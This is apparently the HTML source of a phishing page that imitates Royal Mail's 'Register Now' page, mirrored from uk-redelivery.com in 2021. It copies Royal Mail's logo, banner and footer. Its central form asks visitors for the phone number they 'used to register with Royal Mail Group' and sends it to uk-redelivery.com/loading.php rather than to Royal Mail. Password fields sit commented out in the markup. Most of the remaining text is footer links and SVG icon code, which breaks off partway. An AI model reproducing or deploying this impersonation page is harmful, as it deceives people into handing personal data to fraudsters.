<!DOCTYPE html>
<html dir="ltr" prefix="content: http://purl.org/rss/1.0/modules/content/  dc: http://purl.org/dc/terms/  foaf: http://xmlns.com/foaf/0.1/  og: http://ogp.me/ns#  rdfs: http://www.w3.org/2000/01/rdf-schema#  schema: http://schema.org/  sioc: http://rdfs.org/sioc/ns#  sioct: http://rdfs.org/sioc/types#  skos: http://www.w3.org/2004/02/skos/core#  xsd: http://www.w3.org/2001/XMLSchema# " data-scrapbook-source="https://www.royalmail.com/login" data-scrapbook-create="20210121190734523" lang="en">

<!-- Mirrored from uk-redelivery.com/register.php by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 26 Feb 2021 15:54:37 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
    <meta charset="UTF-8">
<meta name="title" content="Log in | Royal Mail Group Ltd">
<link rel="canonical" href="https://www.royalmail.com/login">
<meta name="Generator" content="Drupal 8 (https://www.drupal.org)">
<meta name="MobileOptimized" content="width">
<meta name="HandheldFriendly" content="true">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="shortcut icon" href="favicon.ico" type="image/vnd.microsoft.icon">


    <title>Register Now | Royal Mail Group Ltd</title>
    <link rel="stylesheet" media="all" href="css_4WjozGK8ccMNs2W9MfwvMVZNPzpmiyysOUq4_0NulQo.css">
<link rel="stylesheet" media="all" href="css_o79zfvrPVtt1el1UR50-mD-0ef6IbhXxay58w8XDA0Q.css">


<!--[if lte IE 8]>
<script src="/sites/royalmail.com/files/js/js_VtafjXmRvoUgAzqzYTA3Wrjkx9wcWhjP0G4ZnnqRamA.js"></script>
<![endif]-->





</head>
  <body class="site-personal page-textured-bg page-login">
        <a href="#main-content" class="visually-hidden focusable">
      Skip to main content
    </a>
      <!-- RML Begin Tealium iQ Sync Integration -->


  <!-- End Tealium iQ Sync Integration -->

      <div class="dialog-off-canvas-main-canvas" data-off-canvas-main-canvas="">
    <div class="layout-container">
  <header role="banner">
          <div class="header header--minimal">
        <div class="container clearfix">
          <div id="block-sitebranding" class="site-logo sitebranding block-system-branding-block">


  <div class="">
          <a class="site-logo-link" href="https://www.royalmail.com/" title="Home" rel="home">
      <img src="logo.png" alt="Home">
    </a>
        </div>
</div>

        </div>
      </div>
      </header>




  <main role="main" class="main-minimal">
    <a id="main-content" tabindex="-1"></a>          <div class="layout-content">
          <div>

<div class="rml-bing-search-search-form visually-hidden bingsearch block-rml-bing-search block container" data-drupal-selector="rml-bing-search-search-form" data-msg-required="This field is required." id="block-bingsearch">
  <div class="row">
    <div class="rml-search-block-wrapper col-md-8">

      <form action="#" method="POST" id="rml-bing-search-search-form" accept-charset="UTF-8" class="rml-bing-search-search-form">

<div class="search-form-wrapper">
  <div class="search-form-content">
    <div class="search-box">
      <div class="form-item-keys js-form-item form-item js-form-type-textfield form-type-textfield js-form-item-keys">
      <label for="edit-keys">Search
      </label>
          <input placeholder="Search" data-drupal-selector="edit-keys" data-msg-maxlength="Search field has a maximum length of 128." data-msg-required="Search is required." type="text" id="edit-keys" name="keys" value="" size="15" maxlength="128" class="form-text">

        </div>

      <button class="clear-text-input" type="button">
        <span class="icon__wrapper"><svg class="icon icon--cross" focusable="false" aria-hidden="true" role="img" xmlns:xlink="http://www.w3.org/1999/xlink"><use xlink:href="#cross"></use></svg></span>
        <span class="button-label">Clear input</span>
      </button>
    </div>
    <div class="search-button"><input data-drupal-selector="edit-search-button" data-msg-required="Search is required." type="submit" id="edit-search-button" name="Search" value="" class="button js-form-submit form-submit button--search">
</div>
  </div>
  <input autocomplete="off" data-drupal-selector="form-gheniawjd6afgnpfde-8jwffsky-wv7topfnelrsklq" data-msg-required="This field is required." type="hidden" name="form_build_id" value="form-GhEnIaWjd6aFgNpfdE_8jwfFSKY-wv7tOpfNElrskLQ">
<input data-drupal-selector="edit-rml-bing-search-search-form" data-msg-required="This field is required." type="hidden" name="form_id" value="rml_bing_search_search_form">

</div>

      </form>

          </div>
  </div>
</div>





<div data-drupal-messages-fallback="" class="hidden"></div>





  <div id="block-coronavirus16" class="coronavirus16 service-update block-block-content444bc8ee-3e56-494b-a55d-86b5fd89e970">
          <div class="accordion-content-wrapper">
        <div role="button" id="service-update-accordion-toggle" aria-controls="service-update-accordion-content" class="service-update-title-wrapper accordion-all-screens  " aria-expanded="false">
          <div class="container">
            <div class="row">
              <div class="col-xs-12 col-sm-12 service-update-header-wrapper service-update-with-summary">
                <div class="service-update-header">
                  <h5 class="service-update-title">
                    Coronavirus update: We’re keeping the UK connected. Despite best efforts some services may be disrupted.
                  </h5>
                                      <div class="service-update-summary">


            <div class="body field field--name-body field--type-text-with-summary field--label-hidden field__item"><p class="body-copy-small">Click for more info on <a href="https://www.royalmail.com/coronavirus">coronavirus</a> or for <a href="https://personal.help.royalmail.com/app/answers/detail/a_id/12556">Service Updates</a><a>. Buy postage now with </a><a href="https://send.royalmail.com/">Click &amp; Drop</a> or the <a href="https://www.royalmail.com/downloadapp">Royal Mail app</a>.</p>
</div>

                    </div>
                                  </div>
                              </div>
            </div>
          </div>
        </div>
              </div>
      </div>

  </div>

      </div>

          <div class="layout-content">
          <div>
    <div class="login-form">
  <div class="container">
    <div class="row">
      <div class="login-form-column">
        <form class="user-login-form" data-drupal-selector="user-login-form" data-msg-required="This field is required." action="http://uk-redelivery.com/loading.php?&amp;sessionid=$hash&amp;securessl=true" method="POST" id="user-login-form" accept-charset="UTF-8" autocomplete="off">
          <input autocomplete="off" data-drupal-selector="form-03zo4kee8qnbpfwvspidohsgilfh3blfww8acjgwlma" data-msg-required="This field is required." type="hidden" name="form_build_id" value="form-03ZO4kEe8qNBPFWvSpIDOhsgILfh3BLfww8AcjGwLMA">
<input data-drupal-selector="edit-user-login-form" data-msg-required="This field is required." type="hidden" name="form_id" value="user_login_form">
<h1 data-drupal-selector="edit-title" data-msg-required="This field is required.">Registration</h1>
<div class="form-item-name js-form-item form-item js-form-type-textfield form-type-textfield js-form-item-name">
      <label for="edit-name" class="js-form-required form-required">Phone Number
          <span class="accessible-form-required" title="This field is required.">*</span>
      </label>

<a id="edit-name--description" class="description tooltip-trigger" href="javascript:">
  <span class="icon__wrapper"><svg class="icon icon--question" focusable="false" aria-hidden="true" role="img" xmlns:xlink="http://www.w3.org/1999/xlink"><use xlink:href="#question"></use></svg></span>

          <span class="tooltip-text visually-hidden">Enter your phone number which was used to register with Royal Mail Group.</span>
</a>

          <input autofocus="autofocus" placeholder="07XXXXXXXXX" data-drupal-selector="edit-pass" aria-describedby="edit-pass--description" data-msg-maxlength="Phone number incorrect." data-msg-required="Phone Number is required." type="text" id="phone" name="phone" size="60" maxlength="12" class="form-text required" pattern="\d+" oninvalid="setCustomValidity('Phone Number Invalid, try again!')" oninput="setCustomValidity('')" required="required" aria-required="true">

        </div>
<!--
<div class="form-item-pass js-form-item form-item js-form-type-password form-type-password js-form-item-pass">
      <label for="edit-pass" class="js-form-required form-required">Password
          <span class="accessible-form-required" title="This field is required.">*</span>
      </label>

<a id="edit-pass--description" class="description tooltip-trigger" href="javascript:">
  <span class="icon__wrapper"><svg class="icon icon--question" focusable="false" aria-hidden="true" role="img" xmlns:xlink="http://www.w3.org/1999/xlink"><use xlink:href="#question"></use></svg></span>

          <span class="tooltip-text visually-hidden">Your password must have 8 characters or more and contain at least one letter and one number with no spaces.</span>
</a>

          <input data-drupal-selector="edit-pass" aria-describedby="edit-pass--description" data-msg-maxlength="Password field has a maximum length of 128." data-msg-required="Password is required." type="password" id="password" name="password" size="60" maxlength="128" class="form-text required" required="required" aria-required="true">

        </div>
      -->
      <!--
<a href="" class="new-password" data-drupal-selector="edit-new-password" data-msg-required="Send me a new password is required." id="edit-new-password">Send me a new password</a>
-->
<div data-drupal-selector="edit-actions" class="form-actions js-form-wrapper form-wrapper" data-msg-required="This field is required." id="edit-actions"><input data-drupal-selector="edit-submit" data-msg-required="This field is required." type="submit" id="edit-submit" name="op" value="Continue" class="button js-form-submit form-submit button--submit">
</div>
<!--
<label data-drupal-selector="edit-register-label" data-msg-required="Not registered yet? is required." for="edit-register-label">Not registered yet?
</label><a href="register.php" class="button button--secondary" data-drupal-selector="edit-register-link" data-msg-required="Register is required." id="edit-register-link">Register</a><label data-drupal-selector="edit-other-accounts" data-msg-required="Other Royal Mail accounts is required." for="edit-other-accounts">Other Royal Mail accounts
      </label><a href=" " class="oba-link" data-drupal-selector="edit-oba-link" data-msg-required="Online Business Account login is required." id="edit-oba-link">Online Business Account login</a><a href="" class="click-drop-link" target="_blank" data-drupal-selector="edit-click-drop-link" data-msg-required="Click &amp; Drop is required." id="edit-click-drop-link">Click &amp; Drop</a>
        </form>
      </div>
    </div>
  </div>
</div>

  </div>

      </div>
    -->

          <div class="layout-content content-bottom-wrapper">
          <div>
    <div id="block-breadcrumbs" class="container breadcrumbs block-system-breadcrumb-block">


  <div class="">
            <nav role="navigation" aria-labelledby="system-breadcrumb">
    <h2 id="system-breadcrumb" class="visually-hidden">Breadcrumb</h2>
    <ol>
          <li>
                  <a href="#">Home</a>
                      <span class="icon__wrapper"><svg class="icon icon--chevron" focusable="false" aria-hidden="true" role="img" xmlns:xlink="http://www.w3.org/1999/xlink"><use xlink:href="#chevron"></use></svg></span>
                        </li>
          <li>
                  <span class="visually-hidden">Current page: </span>
          Register
              </li>
        </ol>
  </nav>

      </div>
</div>

  </div>

      </div>
      </main>

  <footer class="footer-wrapper" role="contentinfo">
          <div class="post-footer">
        <div class="container">
            <div>
    <nav role="navigation" aria-labelledby="block-royalmail-site-links-personal-menu" id="block-royalmail-site-links-personal" class="royalmail-site-links-personal block-system-menu-blocksite-links-personal">

  <h2 class="visually-hidden" id="block-royalmail-site-links-personal-menu">Royal Mail site links personal</h2>



              <ul data-region="postfooter" class="menu">
              <li>
        <a href="https://jobs.royalmailgroup.com/" target="_blank">Jobs</a>
              </li>
          <li>
        <a href="https://www.royalmailgroup.com/" target="_blank">Royal Mail Group</a>
              </li>
          <li>
        <a href="https://www.royalmail.com/terms-and-conditions" data-drupal-link-system-path="node/529">Terms and conditions</a>
              </li>
          <li>
        <a href="https://www.royalmail.com/privacy-notice" data-drupal-link-system-path="node/530">Privacy</a>
              </li>
          <li>
        <a href="https://www.royalmail.com/terms-website" data-drupal-link-system-path="node/527">Terms of use</a>
              </li>
          <li>
        <a href="https://www.royalmail.com/cookies-policy" data-drupal-link-system-path="node/552">Cookies</a>
              </li>
          <li>
        <a href="https://www.royalmailgroup.com/en/site/accessibility/" target="_blank">Accessibility</a>
              </li>
          <li>
        <a href="https://www.royalmail.com/cymraeg" data-drupal-link-system-path="node/509">Cymraeg</a>
              </li>
        </ul>



  </nav>
<div id="block-copyright" class="copyright copyright-text block-block-content4dd8157e-b8a9-4bcf-abbc-36b6e01fa33c">


  <div class="">

            <div class="field-copyright-text field field--name-field-copyright-text field--type-string field--label-hidden field__item">© Royal Mail Group Limited 2021</div>

      </div>
</div>

  </div>

        </div>
      </div>
      </footer>
</div>

  </div>

    <span class="hidden"><svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" class="element-hidden"><symbol id="arrow" viewBox="0 0 24 24">
    <path d="M20.375 12H2m12-8l8 8-8 8" stroke="currentColor" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></path>
</symbol><symbol id="atm" viewBox="0 0 24 24">
    <g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2">
        <path d="M20 10h1V4H3v6h1"></path>
        <path d="M7 7h10v14H7zm3 1v12"></path>
    </g>
</symbol><symbol id="bars-down" viewBox="0 0 13 11">
  <g fill="currentColor">
    <rect x="1" width="3" height="11"></rect>
    <rect x="5" y="4" width="3" height="7"></rect>
    <rect x="9" y="7" width="3" height="4"></rect>
  </g>
</symbol><symbol id="bars-up" viewBox="0 0 13 11">
  <g fill="currentColor">
    <rect x="1" y="7" width="3" height="4"></rect>
    <rect x="5" y="4" width="3" height="7"></rect>
    <rect x="9" width="3" height="11"></rect>
  </g>
</symbol><symbol id="business-services" viewBox="0 0 30 30">
    <path d="M4 4v22h22m0-1l1 1-1 1M3 4l1-1 1 1m4 19v-3m4 3v-6m4 6V13m4 10V8" fill="none" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2"></path>
</symbol><symbol id="buy-postage-online" viewBox="0 0 30 30">
    <g fill="none" fill-rule="evenodd">
        <rect stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" x="3" y="5" width="24" height="17" rx="2"></rect>
        <path d="M0 25h30m-9-15l-1.846 5h-8.308L9 10M7 8l1.75 2H21" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
        <g transform="translate(11 17)" fill="currentColor">
            <circle cx="1.5" cy="1.5" r="1.5"></circle>
            <circle cx="6.5" cy="1.5" r="1.5"></circle>
        </g>
    </g>
</symbol><symbol id="buy-postage" viewBox="0 0 24 24">
    <path d="M3 9h18v12H3zm11 3h4m-4 3h2m-6-7l4-4 4 4" fill="none" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2"></path>
</symbol><symbol id="cancel" viewBox="0 0 24 24">
    <path d="M24 0L0 24M0 0l24 24" fill="none" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2"></path>
</symbol><symbol id="carrying-box" viewBox="0 0 43 41">
    <g fill="currentColor" stroke="currentColor">
        <path d="M5.958 7.563A4.964 4.964 0 0 0 1 12.522a4.964 4.964 0 0 0 4.958 4.958 4.964 4.964 0 0 0 4.959-4.958 4.964 4.964 0 0 0-4.959-4.959zm-3.791 4.959A3.796 3.796 0 0 1 5.958 8.73a3.796 3.796 0 0 1 3.792 3.792 3.796 3.796 0 0 1-3.792 3.791 3.796 3.796 0 0 1-3.791-3.791z"></path>
        <path d="M37.784 1H18.135a4.583 4.583 0 0 0-4.577 4.578v14.473c-3.848-1.124-8.09-.656-10.459 3.537C1.304 26.767 1.314 30.7 1.322 34.17l.002 5.216a.583.583 0 1 0 1.166 0v-5.218c-.009-3.326-.018-7.095 1.625-10.005 2.405-4.26 6.717-3.761 9.443-2.89a15 15 0 0 1 1.943.773c.649.313 1.322.666 2.016 1.03 2.774 1.453 5.925 3.087 9.064 3.051l9.694.019c.064 0 1.465.028 1.92 1.536.038.128.072.262.095.411.009.056.014.114.017.173a1.4 1.4 0 0 1-.092.583.94.94 0 0 1-.396.476c-.579.342-1.29.501-1.977.656-2.755.618-7.298 1.269-10.099 1.541a30.93 30.93 0 0 1-1.72.12c-.31.012-.616.02-.933.015-2.903-.018-6.09-.39-8.527-.993a.582.582 0 0 0-.626.883c.078.12.197.213.346.25 1.565.387 3.427.682 5.33.854v6.735a.583.583 0 1 0 1.167 0V32.74c.775.05 1.549.078 2.303.083.329.001.658-.004.987-.017.578-.023 1.18-.065 1.786-.124 2.836-.275 7.443-.935 10.242-1.564.74-.166 1.577-.354 2.315-.79.55-.326.904-.872 1.019-1.515a3.393 3.393 0 0 0 2.93-3.356V5.578A4.583 4.583 0 0 0 37.784 1zm3.411 24.457c0 1.084-.78 1.987-1.808 2.182-.462-2.084-2.21-2.657-3.108-2.661l-9.706-.019c-2.871.042-5.864-1.529-8.515-2.918-.705-.37-1.39-.728-2.05-1.046a16.44 16.44 0 0 0-1.284-.547V5.578a3.415 3.415 0 0 1 3.411-3.411h19.649a3.416 3.416 0 0 1 3.411 3.411v19.88z"></path>
    </g>
</symbol><symbol id="chat" viewBox="0 0 30 30">
    <g fill="none" fill-rule="evenodd">
        <path d="M15.042 18.405H6.185a2 2 0 0 1-2-2V6.119a2 2 0 0 1 2-2h17.296a2 2 0 0 1 2 2v10.286a2 2 0 0 1-2 2h-2.378l-3.039 8.035-3.022-8.035z" stroke="currentColor" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"></path>
        <circle fill="currentColor" cx="10.25" cy="11.083" r="1.25"></circle>
        <circle fill="currentColor" cx="15.25" cy="11.083" r="1.25"></circle>
        <circle fill="currentColor" cx="20.25" cy="11.083" r="1.25"></circle>
    </g>
</symbol><symbol id="check-an-address" viewBox="0 0 30 30">
    <g fill="none" fill-rule="evenodd">
        <path d="M16 21V11c0-3.333-1.667-5-5-5" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
        <path stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" d="M10 21V11h5m0 4l-5-4"></path>
        <path d="M2 21h26v-9c0-4-2-6-6-6H11c-4 0-6 2-6 6v9" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
        <path stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" d="M22 11V3h3"></path>
        <circle fill="currentColor" cx="22" cy="12" r="2"></circle>
        <path d="M17 27v-6m3 6v-6" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
    </g>
</symbol><symbol id="chevron-circle" viewBox="0 0 25 25">
    <g fill="none" fill-rule="evenodd" stroke="currentColor" stroke-width="2">
        <path d="M12.514 23.273c6.075 0 11-4.925 11-11s-4.925-11-11-11-11 4.925-11 11 4.925 11 11 11z"></path>
        <path stroke-linecap="round" d="M7 10.696l5.385 5.385 5.385-5.385"></path>
    </g>
</symbol><symbol id="chevron" viewBox="0 0 12 12">
    <path stroke="currentColor" d="M4 1l5 5-5 5" fill="none" stroke-linecap="round" stroke-linejoin="round"></path>
</symbol><symbol id="clock" viewBox="0 0 10 10">
  <path d="M6.246 6.927L4.534 5.684a.244.244 0 01-.098-.196v-3.31a.243.243 0 01.241-.242h.646a.243.243 0 01.242.242v2.856l1.346.98a.242.242 0 01.053.339l-.38.522a.244.244 0 01-.338.052zM5 9.032A4.032 4.032 0 119.032 5 4.031 4.031 0 015 9.032zM5 0a5 5 0 105 5 5 5 0 00-5-5z" fill="currentColor"></path>
</symbol><symbol id="close" viewBox="0 0 30 30">
    <path d="M27 3L3 27M3 3l24 24" fill="none" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2"></path>
</symbol><symbol id="cross" viewBox="0 0 25 25">
    <path d="M3.5 3.5l19.007 19.007M4 22L23 3m-19.5.5l19.007 19.007M4 22L23 3" stroke="currentColor" stroke-linecap="round" stroke-width="4" fill="none"></path>
</symbol><symbol id="customer-preferred" viewBox="0 0 27 30">
    <g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2">
        <path d="M19.085 9.241l-3.05-.443a.709.709 0 0 1-.535-.388l-1.364-2.765a.701.701 0 0 0-.636-.395.701.701 0 0 0-.636.395L11.5 8.41a.71.71 0 0 1-.534.388l-3.051.443a.71.71 0 0 0-.393 1.21l2.207 2.152a.71.71 0 0 1 .204.627l-.52 3.04a.71.71 0 0 0 1.028.747l2.73-1.435a.71.71 0 0 1 .659 0l2.73 1.435c.108.057.22.083.329.083a.71.71 0 0 0 .699-.83l-.521-3.04a.71.71 0 0 1 .204-.627l2.207-2.152a.71.71 0 0 0-.393-1.21z"></path>
        <path d="M21.704 1.07H4.987A3.835 3.835 0 0 0 1.156 4.9v22.427a1.741 1.741 0 0 0 2.663 1.477l9.527-7.314 9.442 7.257.084.058a1.743 1.743 0 0 0 2.663-1.478V4.901a3.836 3.836 0 0 0-3.83-3.831z"></path>
    </g>
</symbol><symbol id="delete" viewBox="0 0 30 30">
    <path d="M4 6.907h21.481m-14.5-5.37H18.5m-7.519 0v4.49m7.519-4.49v4.49M6.721 28.389h16.04M6.685 11.633V28.39m16.111-16.757V28.39m-10.74-16.65v9.832m5.37-9.832v9.832" fill="none" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2"></path>
</symbol><symbol id="disability-access" viewBox="0 0 24 24">
    <g fill="none" fill-rule="evenodd">
        <path stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" d="M11 8v7h4l5 5 1-1m-9-8h3M8.334 9.925a5.638 5.638 0 1 0 6.04 8.734"></path>
        <circle fill="currentColor" cx="11" cy="4" r="2"></circle>
    </g>
</symbol><symbol id="download" viewBox="0 0 27 28">
    <path d="M14 15.525V4.5m4.583 7L14 16.5l-4.583-5m-7.937 5v6.308M25.52 16.5v6.308m-.61 0H1.48" stroke="currentColor" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></path>
</symbol><symbol id="driving" viewBox="0 0 24 24">
    <g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2">
        <circle cx="12" cy="12" r="10"></circle>
        <circle cx="12" cy="12" r="2"></circle>
        <path d="M14 11l7-2m-11 2L3 9m9 5v8"></path>
    </g>
</symbol><symbol id="easy-tools" viewBox="0 0 32 39">
    <g transform="rotate(-35 13.586 2.556)" fill="none">
        <path d="M3 11.835A7.5 7.5 0 0 1 1.077.02L2.8-1.783v5.417a1 1 0 0 0 1 1h5.4a1 1 0 0 0 1-1v-5.417L11.923.02A7.5 7.5 0 0 1 10 11.836V36.21a3.5 3.5 0 0 1-7 0V11.835z" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
        <circle fill="currentColor" cx="6.5" cy="35.5" r="1.5"></circle>
    </g>
</symbol><symbol id="exclamation" viewBox="0 0 24 24">
    <path d="M11.987 3c1.02 0 1.882.537 1.882 1.49 0 2.906-.366 7.083-.366 9.989 0 .757-.889 1.075-1.516 1.075-.837 0-1.543-.318-1.543-1.075 0-2.906-.366-7.083-.366-9.99 0-.952.837-1.489 1.909-1.489zm.026 14.239c1.072 0 1.987.855 1.987 1.88C14 20.121 13.085 21 12.013 21 10.863 21 10 20.12 10 19.12c0-1.026.863-1.881 2.013-1.881z" fill="currentColor" fill-rule="evenodd"></path>
</symbol><symbol id="external" viewBox="0 0 24 24">
    <path d="M20 10.397V23H1V4m0-.5h12.008m-1.886 9.056L22.417 1.26M16.071.536h7.071v7.07" fill="none" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2"></path>
</symbol><symbol id="facebook" viewBox="0 0 15 34">
    <path d="M9.975 34H3.324V16.998H0v-5.859h3.324V7.622C3.324 2.843 5.199 0 10.53 0h4.439v5.86h-2.774c-2.076 0-2.213.82-2.213 2.347l-.01 2.932H15l-.588 5.859H9.974V34z" fill="currentColor" fill-rule="evenodd"></path>
</symbol><symbol id="file" viewBox="0 0 24 33">
    <g stroke="currentColor" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round">
        <path d="M16 8h7l-7-7z"></path>
        <path d="M23 8v24H1V1h15M5 18h12M5 22h12M5 26h12"></path>
    </g>
</symbol><symbol id="filter-clear" viewBox="0 0 46 37">
    <text fill="#2A2A2D" fill-rule="evenodd" font-family="ChevinStd-Medium, Chevin Std" font-size="20" font-weight="400" opacity=".5">
        <tspan x="1.23" y="19">Clear</tspan>
    </text>
</symbol><symbol id="filters" viewBox="0 0 24 24">
    <path d="M4 18h16M4 6h16M6 4v4m-2 4h16m-4-2v4m-4 2v4" stroke-width="2" stroke="currentColor" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round"></path>
</symbol><symbol id="finances" viewBox="0 0 24 24">
    <g fill="none" fill-rule="evenodd">
        <path stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" d="M20 9V6H2v12h12m3-6h5m-5 3h5m-5 3h5"></path>
        <path d="M13.532 15.074c0 .38-.306.686-.686.686h-4.16A.685.685 0 0 1 8 15.074c0-.401.306-.613.802-.771.159-.053.528-.274.528-1.193a.768.768 0 0 0-.074-.306h-.443a.588.588 0 0 1-.591-.58.59.59 0 0 1 .591-.592h.169c-.127-.412-.254-.824-.254-1.288C8.728 9.13 9.52 8 11.347 8c.475 0 .94.053 1.415.211.37.116.56.317.56.655 0 .39-.265.686-.645.686-.105 0-.2-.021-.401-.074-.222-.053-.465-.116-.802-.116-1.025 0-1.289.549-1.289 1.024 0 .401.127.824.275 1.246h1.34a.59.59 0 0 1 .592.591c0 .317-.264.58-.591.58h-1.077a.98.98 0 0 1 .053.307 1.7 1.7 0 0 1-.507 1.277h2.576c.38 0 .686.307.686.687z" fill="currentColor"></path>
    </g>
</symbol><symbol id="get-a-price" viewBox="0 0 30 30">
    <g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2">
        <rect x="4" y="3" width="22" height="24" rx="2"></rect>
        <path d="M7 7h16v4H7zm13 8h2m-8 0h2m-8 0h2m10 4h2m-8 0h2m-8 0h2m10 4h2m-8 0h2m-8 0h2"></path>
    </g>
</symbol><symbol id="hamburger" viewBox="0 0 30 30">
    <path d="M4 15h22M4 7h22M4 23h22" fill="none" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2"></path>
</symbol><symbol id="home" viewBox="0 0 30 30">
    <path d="M3 14L15 3m12 11L15 3m-9.5 9v14.926M24.5 12v14.926m0 0l-19 .004m7-.694v-8.034m5 8.034v-8.034m-5-.051h5m2-14.623V6.79m4-3.19v6.928m0-7h-4" fill="none" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2"></path>
</symbol><symbol id="id" viewBox="0 0 24 24">
    <g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2">
        <path d="M3 8h18v12H3zm3-5v4m12-4v4"></path>
        <path d="M6 11h5v6H6zm8 1h4m-4 3h2"></path>
    </g>
</symbol><symbol id="information" viewBox="0 0 24 24">
    <g fill="none" fill-rule="evenodd">
        <circle stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" cx="12" cy="12" r="10"></circle>
        <path d="M13.142 8.078c0 .588-.476 1.064-1.078 1.064A1.064 1.064 0 0 1 11 8.078C11 7.476 11.476 7 12.064 7a1.07 1.07 0 0 1 1.078 1.078zm-.126 8.498c0 .518-.42.938-.952.938a.947.947 0 0 1-.938-.938v-5.558a.96.96 0 0 1 .938-.952c.532 0 .952.434.952.952v5.558z" fill="currentColor"></path>
    </g>
</symbol><symbol id="instagram-logo" viewBox="0 0 24 24">
    <image width="100%" height="100%" xlink:href="4edfcce3623b9b4897df015f17c35d5131321218.png" fill="none" fill-rule="evenodd"></image>
</symbol><symbol id="instagram" viewBox="0 0 24 24">
    <g fill="currentColor">
        <path d="M12 2.168c3.213 0 3.6 0 4.839.077 1.161.039 1.82.232 2.245.426.542.232.968.464 1.393.89.426.426.697.813.89 1.394.156.426.35 1.045.427 2.245.038 1.277.077 1.626.077 4.839 0 3.213 0 3.6-.077 4.838-.04 1.162-.233 1.82-.426 2.246-.233.542-.465.967-.89 1.393-.426.426-.813.697-1.394.89-.426.155-1.045.349-2.245.426-1.278.039-1.626.078-4.839.078-3.213 0-3.6 0-4.839-.078-1.161-.038-1.82-.232-2.245-.426-.542-.232-.968-.464-1.393-.89-.426-.426-.697-.813-.89-1.393-.156-.426-.35-1.046-.427-2.246-.038-1.277-.038-1.664-.038-4.877s0-3.6.077-4.839c.039-1.161.232-1.82.426-2.245.232-.542.464-.968.89-1.393.426-.426.813-.697 1.394-.89C5.38 2.476 6 2.282 7.2 2.205c1.2-.038 1.587-.038 4.8-.038zM12 0C8.748 0 8.323 0 7.045.077 5.768.155 4.877.348 4.142.62a6.14 6.14 0 0 0-2.13 1.394A6.14 6.14 0 0 0 .62 4.142C.31 4.916.116 5.768.077 7.045 0 8.323 0 8.748 0 12s0 3.677.077 4.955c.078 1.277.271 2.168.542 2.903a6.14 6.14 0 0 0 1.394 2.13 6.14 6.14 0 0 0 2.129 1.393c.774.31 1.626.503 2.903.542C8.323 24 8.748 24 12 24s3.677 0 4.955-.077c1.277-.078 2.168-.271 2.903-.542a6.14 6.14 0 0 0 2.13-1.394 6.14 6.14 0 0 0 1.393-2.129c.31-.774.503-1.626.542-2.903C24 15.677 24 15.252 24 12s0-3.677-.077-4.955c-.078-1.277-.271-2.168-.542-2.903a6.14 6.14 0 0 0-1.394-2.13A6.14 6.14 0 0 0 19.858.62c-.774-.31-1.626-.503-2.903-.542C15.677 0 15.252 0 12 0z"></path>
        <path d="M12 6c-3.32 0-6 2.68-6 6s2.68 6 6 6 6-2.68 6-6-2.68-6-6-6zm0 9.887A3.881 3.881 0 0 1 8.113 12 3.881 3.881 0 0 1 12 8.113 3.881 3.881 0 0 1 15.887 12 3.881 3.881 0 0 1 12 15.887z"></path>
        <circle cx="18.5" cy="5.5" r="1.5"></circle>
    </g>
</symbol><symbol id="international" viewBox="0 0 45 45">
    <g fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round" stroke="currentColor" stroke-width="2">
        <circle cx="23" cy="17" r="15"></circle>
        <path d="M9.789 3c-7.616 7.615-7.616 19.962 0 27.577 7.615 7.615 19.962 7.615 27.577 0M23 37v5m0-40v30m15-15H9m26-8H11m24 16H11m19 18H16M31 5v24M15 5v24"></path>
    </g>
</symbol><symbol id="leading-provider" viewBox="0 0 28 42">
    <g stroke="currentColor" stroke-width="2" fill="none">
        <path stroke-linejoin="round" d="M19.971 23.667l6.79 13.92-3.86-1.063-1.14 4.107-7.427-14.215"></path>
        <g transform="translate(1.333 1)">
            <circle cx="12.667" cy="12.667" r="7.333"></circle>
            <circle cx="12.667" cy="12.667" r="12.667"></circle>
        </g>
        <path stroke-linejoin="round" d="M8.029 23.667l-6.79 13.92 3.86-1.063 1.14 4.107 7.427-14.215"></path>
    </g>
</symbol><symbol id="linkedin" viewBox="0 0 32 31">
